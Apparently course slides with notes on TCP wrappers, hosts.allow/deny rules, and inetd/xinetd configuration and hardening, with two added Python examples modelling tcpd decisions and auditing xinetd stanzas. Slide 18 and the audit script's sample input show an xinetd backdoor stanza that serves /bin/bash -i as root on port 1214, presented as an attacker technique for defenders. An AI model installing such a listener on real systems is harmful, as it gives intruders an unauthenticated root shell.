1
TCP Wrapper
Provides host-based access control to network services
It has the following features:
Logging
Access Control
Host Name Verification
User Name Verification
Spoofing Protection
The TCP wrappers package (tcp_wrappers) is typically installed by default on current distributions and provides host-based access control to network services.
It has the following features:
Logging - Connections that are monitored by the TCP wrappers daemon (tcpd) are reported through the syslog facility.
Access Control - tcpd supports a simple form of access control that is based on pattern matching. You can also hook the execution of shell commands and scripts when a pattern matches an IP address/mask.
Host Name Verification - tcpd verifies the client host name that is returned by the address->name DNS server by looking at the host name and address that are returned by the name->address DNS server.
User Name Verification - tcpd verifies the username through ident query replies.
Spoofing Protection - can verify the host name to IP address mapping and reject packets with IP source routing.
2
TCP Wrapper
Has the following advantages over other network service control techniques:
Transparency to both the client host and the wrapped network service - Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Allowed users are connected to the requested service while connections from disallowed clients fail
Centralized management of multiple protocols - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
3
TCP Wrapper Advantages
TCP wrappers provide the following advantages over other network service control techniques:
Transparency - both the connecting client and the wrapped network service are unaware that TCP wrappers are in use
Centralized management - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
TCP wrappers provide the following advantages over other network service control techniques:
Transparency to both the client host and the wrapped network service — Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Legitimate users are logged and connected to the requested service while connections from banned clients fail.
Centralized management of multiple protocols — TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management.
4
TCP Wrapper Disadvantages
Services must be compiled with the libwrap library
Only works with a super-daemon such as inetd or xinetd
Ident service not reliable
Doesn’t wrap RPC services
TCP Wrappers is not a firewall replacement
Disadvantages:
Services must be compiled with the libwrap library.
Only works in conjunction with a super-daemon such as inetd or xinetd.
Ident service not reliable - It is nearly impossible for the administrators of the remote service to know whether specific users are connecting via a trustable server or from a computer they themselves control. In the latter case the ident service provides no reliable information.
Doesn’t wrap RPC services.
TCP Wrappers is not a replacement for a firewall; it should be used in conjunction with a firewall and other security enhancements.
5
TCP Wrapper Files
tcpd - TCP wrappers daemon
tcpdchk and tcpdmatch - test programs for tcpd
/etc/hosts.allow - names of the hosts allowed
/etc/hosts.deny - names of the hosts NOT allowed
Note: If the same client/user/ip is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted. If the client is listed in hosts.allow, then access is permitted. If the client is listed in hosts.deny, then access is denied. If no rules for the service are found in either file, or if neither file exists, access to the service is granted.
Advantages:
Logs and applies access controls to remote connections
Lets you define which daemons are wrapped
Performs reverse lookup on host IPs
Disadvantages:
Ident service not reliable
Only looks at network daemons spawned by inetd (xinetd has its own way of performing this function)
Doesn't wrap ALL services (RPC)
Could give a false sense of security
tcpdchk and tcpdmatch - test programs for tcpd
/etc/hosts.allow - This file describes the names of the hosts which are allowed to use the local INET services, as decided by the /usr/sbin/tcpd server.
/etc/hosts.deny - This file describes the names of the hosts which are NOT allowed to use the local INET services, as decided by the /usr/sbin/tcpd server.
NOTE: If the same client/user/ip is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted. If the client is listed in hosts.allow, then access is permitted. If the client is listed in hosts.deny, then access is denied. If no rules for the service are found in either file, or if neither file exists, access to the service is granted.
6
TCP Wrapper Services
In order to gain the benefit of TCP wrappers, the service must be compiled with TCP wrappers (libwrap) support
For example, to determine if sshd is compiled with TCP wrappers support type the command:
ldd /usr/sbin/sshd | grep libwrap
libwrap.so.0 => /lib64/libwrap.so.0 (0x0..
If not supported, rebuild the program with the option to support TCP wrappers
In order to gain the benefit of TCP wrappers, the service must be compiled with TCP wrappers (libwrap) support.
To determine if the service you wish to protect with TCP wrappers is built with TCP wrappers support use the command ldd which prints shared library dependencies. For example, to determine if sshd is compiled with TCP wrappers support type the command:
ldd /usr/sbin/sshd
linux-vdso.so.1 => (0x00007fff54dfe000)
libfipscheck.so.1 => /lib64/libfipscheck.so.1 (0x00007f3b00489000)
libwrap.so.0 => /lib64/libwrap.so.0 (0x00007f3b0027e000)
libaudit.so.1 => /lib64/libaudit.so.1 (0x00007f3b00057000)
libpam.so.0 => /lib64/libpam.so.0 (0x00007f3affe49000)
libselinux.so.1 => /lib64/libselinux.so.1 (0x00007f3affc26000)
libcrypto.so.10 => /lib64/libcrypto.so.10 (0x00007f3aff846000)
........................
The output of this command was considerably longer, but you can look through the list to find the library libwrap; it is found on the third line. You can optionally use grep to search for libwrap.
If the service doesn't support TCP wrappers, check the vendor downloads or the documentation on how to build with TCP wrappers support. You may have to use a different flavor of the service to support TCP wrappers. That is, there are several variants of ftp daemons available for download and some may not support TCP wrappers. Download and install one that does.
When a connection attempt is made to a TCP wrapped service, the service first references the hosts access files (/etc/hosts.allow and /etc/hosts.deny) to determine whether or not the client host is allowed to connect. In most cases, it then uses the syslog daemon (syslogd) to write the name of the requesting host and the requested service to /var/log/secure or /var/log/messages.
If a client host is allowed to connect, TCP wrappers release control of the connection to the requested service and do not interfere further with communication between the client host and the server.
In addition to access control and logging, TCP wrappers can activate commands to interact with the client before denying or releasing control of the connection to the requested network service.
Because TCP wrappers are a valuable addition to any server administrator's collection of security tools, most network services shipped with Red Hat flavors of Linux are linked against the libwrap.a library. Some such applications include /usr/sbin/sshd, /usr/sbin/sendmail, and /usr/sbin/xinetd.
7
TCP Wrapper Operation
tcpd intercepts connection request
tcpd evaluates connection attributes against hosts.allow/hosts.deny
If allowed, tcpd releases control of the connection to the requested service
If denied, tcpd does not release control of the connection
When a connection attempt is made to a TCP wrapped service, tcpd first references the hosts access files (/etc/hosts.allow and /etc/hosts.deny) to determine if the client host is allowed to connect. If configured, and it should be, the name of the requesting host and the requested service are written via syslog.
If a client host is allowed to connect, TCP wrappers release control of the connection to the requested service and do not interfere further with communication between the client host and the server.
If a client is not allowed to connect, TCP wrappers do not release control of the connection to the requested service.
In addition to access control and logging, TCP wrappers can activate commands to interact with the client before denying or releasing control of the connection to the requested network service.
8
TCP Wrapper Configuration
/etc/hosts.allow and /etc/hosts.deny use the format:
daemon_list : client_list [ : option : option : ... ]
Where,
daemon_list - a list of one or more daemons
client_list - a list of one or more hosts
option - optional action list
Both /etc/hosts.allow and /etc/hosts.deny use the following format:
daemon_list : client_list [ : option : option : .... ]
Where,
daemon_list - a list of one or more daemon process names.
client_list - a list of one or more host names, host addresses, patterns or wildcards that will be matched against the client host name or address.
option - optional action or colon-separated list of actions performed when the rule is triggered. Option fields support expansions, launch shell commands, allow or deny access, and alter logging behavior.
9
TCP Wrapper Wildcards
The access control language supports explicit wildcards:
ALL - The universal wildcard, always matches
LOCAL - Matches any host whose name does not contain a dot
UNKNOWN - Matches any unknown name/address
KNOWN - Matches any known name/address
PARANOID - Matches any host whose name does not match its address
Wildcards - the access control language supports explicit wildcards:
ALL - The universal wildcard, always matches.
LOCAL - Matches any host whose name does not contain a dot character.
UNKNOWN - Matches any user whose name is unknown, and matches any host whose name or address are unknown. This pattern should be used with care: host names may be unavailable due to temporary name server problems. A network address will be unavailable when the software cannot figure out what type of network it is talking to.
KNOWN - Matches any user whose name is known, and matches any host whose name and address are known. This pattern should be used with care: host names may be unavailable due to temporary name server problems. A network address will be unavailable when the software cannot figure out what type of network it is talking to.
PARANOID - Matches any host whose name does not match its address. When tcpd is built with -DPARANOID (default mode), it drops requests from such clients even before looking at the access control tables. Build without -DPARANOID when you want more control over such requests.
10
TCP Wrapper Examples
Set default policy to deny all access (/etc/hosts.deny):
ALL: ALL
Explicitly permit authorized hosts (/etc/hosts.allow):
popd : 192.168.1.200 192.168.1.104
imapd : 192.168.1.0/255.255.255.0
sendmail : 192.168.1.0/255.255.255.0
sshd : .xyz.com
TCPD Configuration Examples
Set default policy to deny all access. Edit the file /etc/hosts.deny as follows:
ALL: ALL
Once the default deny policy is applied, you have to explicitly permit authorized hosts by adding them to /etc/hosts.allow:
popd : 192.168.1.200 192.168.1.104
imapd : 192.168.1.0/255.255.255.0
sendmail : 192.168.1.0/255.255.255.0
sshd : .xyz.com
Restrict all connections to non-public services to localhost only. Suppose sshd and ftpd are the names of the services that must be reachable remotely. Edit /etc/hosts.allow and add the following lines:
sshd, ftpd : ALL
ALL : localhost
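The rule format, the wildcards and the examples above can be exercised with the following model of tcpd's decision, an added example that is not from the slides or from the tcp_wrappers package. It assumes no NIS netgroups, no EXCEPT operator and no user@host forms, and it only parses the spawn/twist options rather than running them; the sample files are constructed from the slide rules.

```python
"""Added example (not from the slides): a model of how tcpd reaches its
allow/deny decision from /etc/hosts.allow and /etc/hosts.deny, covering file
precedence, the ALL/LOCAL/KNOWN/UNKNOWN/PARANOID wildcards, '.suffix' and
'prefix.' patterns, net/mask patterns and the allow/deny option keywords."""
import ipaddress
import re
from collections import namedtuple

# tcpd substitutes these strings for the client host name when the reverse
# lookup fails ("unknown") or the name does not resolve back to the address
# ("paranoid"); the KNOWN/UNKNOWN/PARANOID wildcards test for them.
UNKNOWN, PARANOID = "unknown", "paranoid"
Client = namedtuple("Client", "name addr")

# Constructed sample files built from the slide examples (not a real host).
HOSTS_ALLOW = """\
popd : 192.168.1.200 192.168.1.104
imapd : 192.168.1.0/255.255.255.0
sendmail : 192.168.1.0/255.255.255.0
sshd : .xyz.com
ALL : .malware.com \\
    : spawn (/bin/echo "%a from %h attempted to access %d" >> /var/log/connections.log) \\
    : deny
ALL : LOCAL   # everything else only from hosts whose name has no dot
"""
HOSTS_DENY = "ALL : ALL\n"   # default policy: deny whatever hosts.allow did not permit


def parse_rules(text):
    """Parse access-file text into (daemons, clients, options) tuples.  '#' starts
    a comment, a trailing backslash continues the rule; colons inside options are
    not handled (assumed simplification)."""
    rules, logical = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            logical += line[:-1] + " "
            continue
        logical += line
        fields = [f.strip() for f in logical.split(":")]
        if len(fields) >= 2:
            rules.append((re.split(r"[\s,]+", fields[0]),
                          re.split(r"[\s,]+", fields[1]), fields[2:]))
        logical = ""
    return rules


def _string_match(tok, value):
    """tcpd's string_match: '.suffix', 'prefix.' or exact, case-insensitively."""
    tok, value = tok.lower(), value.lower()
    if tok.startswith("."):
        return len(value) > len(tok) and value.endswith(tok)
    if tok.endswith("."):
        return value.startswith(tok)
    return tok == value


def client_match(tok, client):
    """Match one client_list token against a Client (after tcpd's host_match)."""
    name, addr = client.name.lower(), client.addr
    known = name not in (UNKNOWN, PARANOID)
    if tok == "ALL":
        return True
    if tok == "KNOWN":
        return known
    if tok == "UNKNOWN":
        return name == UNKNOWN
    if tok == "PARANOID":
        return name == PARANOID
    if tok == "LOCAL":
        return known and "." not in name
    if "/" in tok:  # net/mask such as 192.168.1.0/255.255.255.0 or 10.0.0.0/8
        try:
            return ipaddress.ip_address(addr) in ipaddress.ip_network(tok, strict=False)
        except ValueError:
            return False
    return _string_match(tok, addr) or _string_match(tok, name)


def hosts_access(daemon, client, allow_rules, deny_rules):
    """Return (granted, matching_rule).  hosts.allow is searched first, then
    hosts.deny; the first rule whose daemon and client lists both match wins and
    a connection matched in neither file is granted.  An explicit 'allow' or
    'deny' keyword in the option field overrides the file's own verdict."""
    for rules, verdict in ((allow_rules, True), (deny_rules, False)):
        for rule in rules:
            daemons, clients, options = rule
            if any(t == "ALL" or _string_match(t, daemon) for t in daemons) \
                    and any(client_match(t, client) for t in clients):
                keywords = [o.lower() for o in options if o.lower() in ("allow", "deny")]
                if keywords:
                    verdict = keywords[-1] == "allow"
                return verdict, rule
    return True, None


ALLOW_RULES, DENY_RULES = parse_rules(HOSTS_ALLOW), parse_rules(HOSTS_DENY)


def decide(daemon, name, addr):
    """True when the sample files grant `daemon` access to the given client."""
    return hosts_access(daemon, Client(name, addr), ALLOW_RULES, DENY_RULES)[0]
```

Note that a .malware.com client is refused even though its rule lives in hosts.allow, because the trailing deny option overrides the file, while an unresolvable client on the LAN reaches sshd only if an address pattern matches it.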
11
TCP Wrapper “twist” Option
Send a message back to the source of the attempted connection after it is dropped
Append the following to /etc/hosts.allow:
ALL : .notallowed.com \
    : severity auth.info \
    : twist /bin/echo "Not allowed %d %h."
The message "Not allowed to use daemon from hostname." will be returned for any daemon not previously configured in the access file. This sends a message back to the source of the attempted connection after it is dropped.
Suppose that a situation occurs where a connection should be denied and a reason should be sent to the source of the attempted connection. That action is possible with twist. When a connection attempt is made, twist executes a shell command or script and sends its output to the source of the attempted connection. For example, append the following to /etc/hosts.allow:
ALL : .notallowed.com \
    : severity auth.info \
    : twist /bin/echo "You are not welcome to use %d from %h."
In this example, the message "You are not allowed to use daemon from hostname." will be returned for any daemon not previously configured in the access file. This sends a message back to the source of the attempted connection after it is dropped. Any message returned must be enclosed in quotes.
spawn and twist variables:
%a - The client's IP address.
%A - The server's IP address.
%c - Supplies a variety of client information, such as the username and hostname, or the username and IP address.
%d - The daemon process name.
%h - The client's hostname (or IP address, if the hostname is unavailable).
%H - The server's hostname (or IP address, if the hostname is unavailable).
%n - The client's hostname. If unavailable, unknown is printed. If the client's hostname and host address do not match, paranoid is printed.
%N - The server's hostname. If unavailable, unknown is printed. If the server's hostname and host address do not match, paranoid is printed.
%p - The daemon process ID.
%s - Various types of server information, such as the daemon process and the host or IP address of the server.
%u - The client's username. If unavailable, unknown is printed.
12
TCP Wrapper “spawn” Option
Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following:
ALL : .malware.com \
    : spawn (/bin/echo "%a from %h attempted to access %d" \
        >> /var/log/connections.log) \
    : deny
This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the accessed daemon to /var/log/connections.log.
Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following:
ALL : .malware.com \
    : spawn (/bin/echo "%a from %h attempted to access %d" \
        >> /var/log/connections.log) \
    : deny
This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the daemon to which access was attempted to /var/log/connections.log.
13
Network Super Server
Listen for network connection on behalf of another program
Hands off control of that connection to intended server
Help reduce memory load and improve security
There are two different super servers:
inetd uses TCP Wrappers to handle security
xinetd has built-in security features
Servers that normally use super server: telnet, FTP, TFTP, rlogin, finger, POP, IMAP
inetd is often referred to as a "super server." A newer super server, xinetd, has replaced inetd; however, there are still systems in place that use inetd. Both pieces of software serve the same purpose, but xinetd is considered more secure and flexible as it offers many features to restrict and throttle access when a system's load rises; therefore, it is chosen over inetd. A system can run either inetd or xinetd but not both.
14
inetd Configuration
service socket protocol {wait|nowait} user server parms
service - name of the service from /etc/services
socket - can be stream, dgram or raw
protocol - can be tcp or udp
wait/nowait - wait for dgram and nowait for other types
user - username used to run the server
server - server binary file, usually /usr/sbin/tcpd
parms - parameters that are passed to the server
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
inetd has been deprecated in favor of xinetd, so it is recommended to replace it with xinetd.
You may run into existing systems using inetd, so it is good to know how to read the configuration so you can convert from inetd format to xinetd.
Main configuration file:
/etc/inetd.conf
Other configuration files typically in /etc/inetd.d/
Syntax:
service socket protocol {wait|nowait} user server parms
service - name of the service as described in /etc/services
socket - can be stream, dgram or raw
protocol - can be tcp or udp
wait/nowait - wait for dgram sockets and nowait for other socket types
user - username used to run the server
server - server binary file, usually the TCP Wrappers daemon (/usr/sbin/tcpd)
parms - parameters that are passed to the server
Example:
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
Disable a service:
add # at the beginning of line
Restarting inetd service:
/etc/init.d/inetd restart
15
xinetd Configuration
service ftp
{
    socket_type = stream
    protocol = tcp
    wait = no
    user = ftp
    server = /usr/sbin/in.ftpd
    server_args = -i
    disable = no
}
Disable a service: change disable to yes
To restart the xinetd service:
/etc/init.d/xinetd {restart|reload}
Configuration file:
/etc/xinetd.conf
Files in /etc/xinetd.d/ are included
Each server run via xinetd installs a file in /etc/xinetd.d
Syntax of /etc/xinetd.conf
Example:
service ftp
{
    socket_type = stream
    protocol = tcp
    wait = no
    user = root
    server = /usr/sbin/in.ftpd
    server_args = -i
    disable = no
}
Disable a service:
Change disable to yes
To restart the xinetd service:
/etc/init.d/xinetd restart
To enhance security, the "user" should not be root for services. If the service is compromised, the attacker will likely gain the access rights of the user the service runs as.
16
xinetd Security Enhancements
Listen on only one network interface for the service:
bind = <IP Address>
Accept connections only from the listed IP addresses:
only_from = <IP Addresses|Network>
Deny connections from the listed IP addresses:
no_access = <IP Addresses|Network>
Set times during which users may access the server:
access_times = hour:min-hour:min
If access is prohibited, send a banner to the client:
banner = /usr/local/etc/deny_banner
Use the following options in /etc/xinetd.conf:
Listen on only one network interface for the service:
bind = <IP Address>
Accept connections only from the listed IP addresses (similar to TCP Wrapper's hosts.allow):
only_from = <IP Addresses|Network>
Deny connections from the listed IP addresses (similar to TCP Wrapper's hosts.deny):
no_access = <IP Addresses|Network>
Set times during which users may access the server:
access_times = hour:min-hour:min
If access is prohibited, send the contents of the file /usr/local/etc/deny_banner to the client:
banner = /usr/local/etc/deny_banner
17
To Run or Not to Run xinetd
To run:
Conserves resources
Runs daemons only when needed
Provides an additional layer of security
Can turn virtually any script or program into a service
Not to run:
Another vulnerable service
Can secure services using other methods
Can be used to create a backdoor listener
Reasons to run xinetd:
xinetd conserves resources, runs daemons only when needed, provides an additional layer of security and can "box" a service into a directory with chroot ("change root"), and it can turn virtually any script or program into a service (this can be bad, see next).
Reasons to not run xinetd:
Like any additional service, it has suffered from vulnerabilities. Although there are currently no known vulnerabilities, that doesn't mean none exist. Another consideration: if the service is secure and offers a secure method of authentication, then a super server isn't required, as the authentication will permit or deny access based on credentials, and other tweaking can be performed by the firewall.
An attacker can use xinetd to create a backdoor into the system.
18
xinetd Backdoor Listener
service kazaa
{
    disable = no
    protocol = tcp
    socket_type = stream
    wait = no
    user = root
    server = /bin/bash
    server_args = -i
}
xinetd reads this file and determines port from /etc/services
Here is an example of a xinetd backdoor listener:
Create a file /etc/xinetd.d/kazaa containing:
service kazaa
{
    disable = no
    protocol = tcp
    socket_type = stream
    wait = no
    user = root
    server = /bin/bash
    server_args = -i
}
When xinetd starts, it reads this file and determines the port from /etc/services:
kazaa 1214/tcp # KAZAA
In this case it creates a backdoor shell listening on port 1214.
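A stanza like this is easy to spot if /etc/xinetd.d is reviewed mechanically. The following audit script is an added example, not from the slides or from xinetd: it parses service stanzas, resolves each service's port from /etc/services text the way xinetd does, and flags enabled services that run as root or whose server is an interactive shell. The stanzas, the /etc/services excerpt and the SHELLS list are constructed for the example.

```python
"""Added example (not from the slides): audit xinetd service stanzas the way a
reviewer of /etc/xinetd.d would, flagging enabled services that run as root or
hand the connection to an interactive shell, and resolving each service's port
from /etc/services as xinetd does.  All input below is constructed inline."""
import os
import re

SHELLS = {"sh", "bash", "dash", "ksh", "zsh", "csh", "tcsh"}   # assumed shell names

# Constructed stanzas: the ftp example from the slides, the backdoor stanza
# from the slides, and a disabled telnet service that must not be flagged.
XINETD_D = """\
service ftp
{
    socket_type = stream
    user        = ftp
    server      = /usr/sbin/in.ftpd
    disable     = no
}

service kazaa
{
    disable     = no
    protocol    = tcp
    socket_type = stream
    wait        = no
    user        = root
    server      = /bin/bash
    server_args = -i
}

service telnet
{
    socket_type = stream
    user        = root
    server      = /usr/sbin/in.telnetd
    disable     = yes
}
"""

# Constructed /etc/services excerpt; the kazaa line is the one from the slide.
ETC_SERVICES = """\
ftp        21/tcp
telnet     23/tcp
kazaa    1214/tcp    # KAZAA
"""


def parse_xinetd(text):
    """Return {service_name: {attribute: value}} from xinetd stanza text.
    The '=', '+=' and '-=' operators are all recorded as plain assignments."""
    services = {}
    for match in re.finditer(r"service\s+(\S+?)\s*\{(.*?)\}", text, re.S):
        attrs = {}
        for line in match.group(2).splitlines():
            line = line.split("#", 1)[0].strip()
            if "=" in line:
                key, _, value = line.partition("=")
                attrs[key.strip().rstrip("+-").strip()] = value.strip()
        services[match.group(1)] = attrs
    return services


def service_port(name, protocol, services_text):
    """Look a service's port up in /etc/services text, as xinetd does when the
    stanza carries no explicit 'port' attribute.  Returns None if absent."""
    for line in services_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and fields[0] == name:
            port, _, proto = fields[1].partition("/")
            if proto == protocol:
                return int(port)
    return None


def audit(services, services_text):
    """Return (service, port, finding) tuples for every enabled stanza that
    runs as root or whose server binary is a shell."""
    findings = []
    for name, attrs in services.items():
        if attrs.get("disable", "no").lower() == "yes":
            continue  # a disabled stanza never listens (default assumed: enabled)
        port = attrs.get("port")
        port = int(port) if port else service_port(name, attrs.get("protocol", "tcp"), services_text)
        server = attrs.get("server", "")
        if os.path.basename(server) in SHELLS:
            findings.append((name, port, "server is a shell (%s %s): remote shell listener"
                             % (server, attrs.get("server_args", ""))))
        if attrs.get("user") == "root":
            findings.append((name, port, "runs as root: a compromise of the service yields root"))
    return findings


FINDINGS = audit(parse_xinetd(XINETD_D), ETC_SERVICES)
```

Run against a real system the same functions would take the concatenated contents of /etc/xinetd.conf and /etc/xinetd.d/* and the real /etc/services.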
19
Evaluation Order
[Flow chart: a connection passes the Firewall, then TCP Wrappers, then (for xinetd services) xinetd; each stage either rejects it or allows it on, ending at the TCP wrapped network service or the xinetd controlled network service.]
The firewall, TCP wrappers, and xinetd function independently of each other and each provide a layer of protection. When troubleshooting connectivity problems when using these services together, follow the chart and watch the logs to find the service responsible.
20
Disable Services/Interfaces
Disable DHCP, configure static IP
Disable or remove unused protocols such as IPv6
Disable wireless networking (to include Bluetooth)
Disable/remove clear text protocols and use their secure replacement
Network Interfaces and protocols:
Most distributions use DHCP by default. For enhanced security, configure a static IP address. This ensures the system keeps the same address at all times, so that any external system such as a firewall or IDS that protects it by address continues to do so. Another solution would be to use a DHCP reservation.
Disable unused protocols such as IPv6. This prevents attackers from using protocols that you may not be monitoring.
Wireless networking presents a risk of information leakage. The best solution is to remove the wireless hardware; if that is not feasible, the drivers can be removed. Although Bluetooth "supposedly" has a limited range, there are proof-of-concept interceptions of Bluetooth signals from a fairly large distance.
It may also be possible to disable wireless in the BIOS.
Disable/remove all clear text protocols. Use other options such as SSH.